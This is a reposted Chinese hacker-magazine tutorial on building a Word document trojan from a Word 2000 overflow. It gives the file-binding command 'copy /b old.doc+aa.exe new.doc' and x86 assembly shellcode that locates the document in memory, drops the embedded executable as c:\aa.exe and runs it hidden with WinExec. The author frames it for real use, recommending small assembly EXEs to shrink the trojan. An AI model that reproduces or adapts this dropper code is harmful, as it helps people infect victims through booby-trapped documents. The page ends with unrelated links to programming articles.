编写word木马的shellcode

2024-02-08 12:18
文章标签 编写 word 木马 shellcode

本文主要是介绍编写word木马的shellcode,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

编写Word木马的ShellCode
作者:Azrael  来源:网鹰工作室  日期:2008-01-08 15:24:00

曹军分析了导致去年“万珍”病毒的Word 2000溢出漏洞细节,但并没涉及漏洞的具体利用;第4期文章,黑防讨论了生成WMF木马的ShellCode的设计与实现。由于自身的特点,Word木马的设计与前者有较大的区别,下面由我对此进行一下分析。

预备知识
讨论ShellCode之前,我们需要掌握几个预备知识:
1.诸如Doc、PDF、WMF、Jpg等文件内容解析过程引发的漏洞,我们都称之为文件解析漏洞。由于漏洞利用的载体是文件,因此这类漏洞最大的特点就是可以制作成木马。
2.通过文件解析漏洞制作木马的方法有3种:第一种是通过ShellCode来完成全部木马功能,缺陷是往往可能受到ShellCode字节数的限制;第2种是通过ShellCode到指定的URL下载并执行木马文件,缺陷是由于访问网络而可能受到防火墙的限制;第3种是在文件直接绑定EXE木马文件,这种方式比较隐蔽,ShellCode只负责生成并运行木马文件,复杂的网络通信与系统访问功能都由木马文件来完成。本文采用第三种方法进行操作。
3.同WMF木马的制作一样,通过copy命令即可在Doc文件绑定EXE文件: copy /b old.doc+aa.exe new.doc。事实上上,绑定两个文件大多可以通过该命令来完成。
4、与WMF木马基于IE传播不同,Word木马则可能有多种传播形式:E-mail、QQ、IE等。因此,通过在IE临时文件夹(TIF)查找文件的思路就不可靠了。

ShellCode设计思路
有了上面的预备知识,在假设漏洞已经分析清楚的前提下,ShellCode的设计思路如下:
1.查找ShellCode可用到的各API函数地址,这里没什么技巧。
2.绑定木马后的Doc文件查找,这是关键。前面说了,最好不通过TIF来查找,因为成功率很低。因此最有效的办法就是内存进行搜索文件路径,方法如下:
1)找到Doc文件填写ShellCode的位置,将前两个字节改为EB FE(JMP -2):
EB FE前面4字节0x0013C3F4就是XP SP2下ShellCode地址。
2)用Word打开上述Doc文件,可以看到CPU占有率达到100%。打开 Softice,输入命令code on,发现EIP指针停留在EB FE指令上。
3)Alt+D调出数据区,发现EB FE指令后不远的内存区域内,总包含我们需要的Doc文件路径。因此,我们通过动态搜索内存的方法可以很快找到地址。但必须注意一个问题:要保证搜索开始地址到Doc文件路径存放地址之间的内存区域一定要连续可读,否则将难以实现。
3.测试时发现内存Doc文件路径是以UNICODE形式表现的,所以必须通过CreateFileW函数打开该Doc文件,然后通过CreateFileA创建文件aa.exe。
4.通过SetFilePointer函数,让Doc文件的指针指向aa.exe文件数据开始的地方,即指向“MZ”。
5.循环Doc文件读取aa.exe文件数据,并写入aa.exe。
6.执行生成的aa.exe,并安全退出WinWord。
汇编实现及ShellCode的提取
思路整理好后,我们开始编程。此程序在Windows XP SP2 +VC6下汇编实现,并测试通过。

1.查找ShellCode可用到的各API函数地址,包括GetProcAddress、LoadLibraryA、CreateFileW、CreateFileA、SetFilePointer、ReadFile、WriteFile、WinExec、ExitThread等。这些函数全部在Kernel32.dll,具体实现请参考4期溢出文章的详细介绍,这里仅给出存放函数地址的内存规划
2.在内存动态搜索Doc文件路径。根据上面的思路,XP SP2下0x0013c300开始搜索,2000+SP4下0x0012c300开始搜索。
小知识:由于Word2000的编译器不是2003.NET的,因此2003下该漏洞利用也应该没问题,各位读者可以测试一下。

搜索部分的汇编代码如下:
//0x0013c300处开始向高地址处搜索当前doc文件路径,搜索标志为:/
//留出空间以备将来存放长的数据
sub esp, 0x800
mov esi, esp
add esi, 4
mov edi, 0x12c300
mov ebx, 0x005C003A //“:/”UNICODE形式
xor ecx, ecx //初始为0
//循环比较
comp:
inc ecx
cmp ebx, dword ptr[edi + ecx - 1]
jnz comp
3.找到Doc文件路径后,通过CreateFileW函数打开该Doc文件,然后通过CreateFileA创建文件aa.exe。汇编代码如下:
lea ebx, dword ptr[edi + ecx - 3]
push 0
push 0x80 //FILE_ATTRIBUTE_NORMAL
push 3 //OPEN_EXISTING
push 0
push 3 //FILE_SHARE_READ | FILE_SHARE_WRITE
push 0x80000000 //GENERIC_READ
push ebx
call dword ptr[ebp + 28h] //CreateFileW
cmp eax, 0
jle gameover //-1则结束
mov dword ptr[ebp + 30h], eax //保存doc文件句柄
//创建可执行文件c:/aa.exe
mov dword ptr[ebp], 0x615c3a63
mov dword ptr[ebp + 4], 'xe.a'
mov dword ptr[ebp + 8], 'e'
push 0
push 0 //FILE_ATTRIBUTE_NORMAL
push 2 //CREATE_ALWAYS
push 0
push 0
push 0x40000000 //GENERIC_WRITE
push ebp
call dword ptr[ebp + 24h] //CreateFileA
cmp eax, 0
jle gameover
mov dword ptr[ebp + 34h], eax //保存exe文件句柄
4.通过SetFilePointer函数让Doc文件指针指向aa.exe文件数据开始的地方,即指向“MZ”。该位置可以直接UltraEdit32读取。汇编代码如下:
//SetFilePointer设置文件偏移(exe文件位置)
push 0
push 0
push 0x6800 //exe文件数据开始处
mov eax, dword ptr[ebp + 30h] //doc文件句柄
push eax
call dword ptr[ebp + 20h] //SetFilePointer
5.循环Doc文件读取aa.exe文件数据,并写入aa.exe。汇编代码如下:
mov dword ptr[ebp + 40h], 0 //保存每次实际读取的数据
mov dword ptr[ebp + 44h], 0 //保存每次实际写入的数据
Read_Write_exe:
push 0
lea eax, dword ptr[ebp + 40h]
push eax
push 0x400 //每次预定读取1024字节
push esi //存放每次读取后数据的缓冲区地址
push dword ptr[ebp + 30h] //doc文件句柄
call dword ptr[ebp+1Ch] //ReadFile
push 0
lea eax, dword ptr[ebp + 44h] //每次实际写入的数据字节数地址
push eax
push dword ptr[ebp + 40h]
push esi
push dword ptr[ebp + 34h] //exe文件句柄
call dword ptr[ebp+18h] //WriteFile
cmp dword ptr[ebp + 44h], 0x400 //判断是否读写完毕
jge Read_Write_exe
//关闭doc和exe文件句柄
push dword ptr[ebp+30h]
call dword ptr[ebp + 38h] //CloseHandle
push dword ptr[ebp+34h]
call dword ptr[ebp + 38h] //CloseHandle
6、最后执行生成的aa.exe,并安全退出WinWord。汇编代码如下:
push 0 //SW_HIDE
push ebp
call dword ptr[ebp + 14h] //Winexec
gameover:
//ExitThread
push 0
call dword ptr[ebp + 3Ch] //ExitThread
OK,汇编实现就是这样了,接下来就是ShellCode的提取提取方法以前黑防也介绍过,就是VC调试界面的内存窗口直接读取汇编代码对应的机器编码:
然后将这些二进制数据拷贝到UltraEdit32,再通过一个简单的转换程序转换为我们熟悉的/x形式即可。具体过程这里就不再讨论了,在光盘我直接给出转换程序代码
Word木马的构造与测试
ShellCode提取之后,我们再通过两个简单的转换程序写入到Doc文档。为了不破坏Doc文档,数据写入的方式应该采用“改写”而不是“插入”。两个转换程序分别为 readdoc和newdoc:前者读取Doc文件数据,后者根据前者得到的数据进行改写,并重新生成Doc文件。程序光盘附带,大家直接编译就可以了。
Word木马的构造前面已经提到,直接通过copy命令即可完成。至于测试……大家可以直接绑定cmd.exe试试,在光盘我也提供了一个绑定后的样本。实际应用,为了减小Doc木马体积,建议大家采用汇编编写的EXE程序。
上面的分析可知,绑定一个文件和绑定多个文件的方法类似,并且和绑定的文件格式无关。
小结
在本文,我们讨论了以Word2000溢出漏洞为基础,创建Word木马的ShellCode编写技术。其实这种方法应用是比较广的,而涉及的技术也大多是比较基础的。最近Word XP和Word 2003又暴出新漏洞,而且已经被成功利用。大家参考2期的漏洞分析文章和本文,相信也能分析出这些新漏洞。最后还是那句老话,欢迎大家交流。

这篇关于编写word木马的shellcode的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/691011

相关文章

使用Python快速实现链接转word文档

《使用Python快速实现链接转word文档》这篇文章主要为大家详细介绍了如何使用Python快速实现链接转word文档功能,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 演示代码展示from newspaper import Articlefrom docx import

Java使用POI-TL和JFreeChart动态生成Word报告

《Java使用POI-TL和JFreeChart动态生成Word报告》本文介绍了使用POI-TL和JFreeChart生成包含动态数据和图表的Word报告的方法,并分享了实际开发中的踩坑经验,通过代码... 目录前言一、需求背景二、方案分析三、 POI-TL + JFreeChart 实现3.1 Maven

使用Python实现在Word中添加或删除超链接

《使用Python实现在Word中添加或删除超链接》在Word文档中,超链接是一种将文本或图像连接到其他文档、网页或同一文档中不同部分的功能,本文将为大家介绍一下Python如何实现在Word中添加或... 在Word文档中,超链接是一种将文本或图像连接到其他文档、网页或同一文档中不同部分的功能。通过添加超

利用Python编写一个简单的聊天机器人

《利用Python编写一个简单的聊天机器人》这篇文章主要为大家详细介绍了如何利用Python编写一个简单的聊天机器人,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 使用 python 编写一个简单的聊天机器人可以从最基础的逻辑开始,然后逐步加入更复杂的功能。这里我们将先实现一个简单的

python实现pdf转word和excel的示例代码

《python实现pdf转word和excel的示例代码》本文主要介绍了python实现pdf转word和excel的示例代码,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价... 目录一、引言二、python编程1,PDF转Word2,PDF转Excel三、前端页面效果展示总结一

基于Java实现模板填充Word

《基于Java实现模板填充Word》这篇文章主要为大家详细介绍了如何用Java实现按产品经理提供的Word模板填充数据,并以word或pdf形式导出,有需要的小伙伴可以参考一下... Java实现按模板填充wor编程d本文讲解的需求是:我们需要把数据库中的某些数据按照 产品经理提供的 word模板,把数据

使用PyQt5编写一个简单的取色器

《使用PyQt5编写一个简单的取色器》:本文主要介绍PyQt5搭建的一个取色器,一共写了两款应用,一款使用快捷键捕获鼠标附近图像的RGB和16进制颜色编码,一款跟随鼠标刷新图像的RGB和16... 目录取色器1取色器2PyQt5搭建的一个取色器,一共写了两款应用,一款使用快捷键捕获鼠标附近图像的RGB和16

使用Java编写一个文件批量重命名工具

《使用Java编写一个文件批量重命名工具》这篇文章主要为大家详细介绍了如何使用Java编写一个文件批量重命名工具,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 目录背景处理1. 文件夹检查与遍历2. 批量重命名3. 输出配置代码片段完整代码背景在开发移动应用时,UI设计通常会提供不

如何编写Linux PCIe设备驱动器 之二

如何编写Linux PCIe设备驱动器 之二 功能(capability)集功能(capability)APIs通过pci_bus_read_config完成功能存取功能APIs参数pos常量值PCI功能结构 PCI功能IDMSI功能电源功率管理功能 功能(capability)集 功能(capability)APIs int pcie_capability_read_wo

C - Word Ladder题解

C - Word Ladder 题解 解题思路: 先输入两个字符串S 和t 然后在S和T中寻找有多少个字符不同的个数(也就是需要变换多少次) 开始替换时: tips: 字符串下标以0开始 我们定义两个变量a和b,用于记录当前遍历到的字符 首先是判断:如果这时a已经==b了,那么就跳过,不用管; 如果a大于b的话:那么我们就让s中的第i项替换成b,接着就直接输出S就行了。 这样